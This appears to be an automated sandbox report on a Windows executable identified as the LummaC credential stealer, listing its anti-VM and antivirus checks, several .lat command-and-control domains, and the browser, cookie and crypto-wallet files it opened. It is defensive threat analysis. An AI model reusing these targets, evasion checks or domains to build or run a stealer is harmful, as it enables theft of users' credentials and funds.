Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: expt64.exe

Binary or memory string: g.vBP

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2

Source: C:\Users\user\Desktop\expt64.exe

Code function: 0_2_022F0CBF CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_022F0CBF

Source: C:\Users\user\Desktop\expt64.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: expt64.exe, 00000000.00000003.2504340980.0000000003367000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2518312999.0000000003346000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2504984696.0000000003348000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: expt64.exe	ReversingLabs: Detection: 65%
Source: expt64.exe	Virustotal: Detection: 72%

Source: expt64.exe

String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\expt64.exe

File read: C:\Users\user\Desktop\expt64.exe

Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: expt64.exe

Static file information: File size 10171362 > 1048576

Source: expt64.exe

Static PE information: real checksum: 0x1560fd4 should be: 0x9bd62e

Source: expt64.exe

Static PE information: section name: .didata

Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_3_0069424A push ecx; retf	0_3_00694270
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023300DC push eax; mov dword ptr [esp], 352E36E1h	0_2_023300DF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02333AF6 push 8F60BAE3h; retf	0_2_02333AFB
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232CFDC push eax; mov dword ptr [esp], 31A531AAh	0_2_0232CFEA

Source: C:\Users\user\Desktop\expt64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\expt64.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\expt64.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe TID: 1324	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe TID: 1252	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: expt64.exe, 00000000.00000003.2517769062.000000000334B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696508427p
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696508427u
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696508427d
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: expt64.exe, 00000000.00000003.2491031020.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491633034.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696508427o
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696508427x
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696508427]
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696508427t
Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696508427

Source: C:\Users\user\Desktop\expt64.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F05AF mov edx, dword ptr fs:[00000030h]	0_2_022F05AF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F0B6F mov eax, dword ptr fs:[00000030h]	0_2_022F0B6F
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F11BF mov eax, dword ptr fs:[00000030h]	0_2_022F11BF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F11BE mov eax, dword ptr fs:[00000030h]	0_2_022F11BE
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F0F1F mov eax, dword ptr fs:[00000030h]	0_2_022F0F1F

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: expt64.exe	String found in binary or memory: talkynicer.lat
Source: expt64.exe	String found in binary or memory: shapestickyr.lat
Source: expt64.exe	String found in binary or memory: manyrestro.lat
Source: expt64.exe	String found in binary or memory: bashfulacid.lat
Source: expt64.exe	String found in binary or memory: tentabatte.lat
Source: expt64.exe	String found in binary or memory: curverpluch.lat
Source: expt64.exe	String found in binary or memory: slipperyloo.lat
Source: expt64.exe	String found in binary or memory: wordyfindy.lat

Source: C:\Users\user\Desktop\expt64.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\expt64.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: expt64.exe, 00000000.00000003.2568391413.0000000000708000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\expt64.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: expt64.exe PID: 6988, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: expt64.exe, 00000000.00000003.2519546371.00000000006A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: expt64.exe, 00000000.00000003.2530528245.00000000006EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: expt64.exe, 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\expt64.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
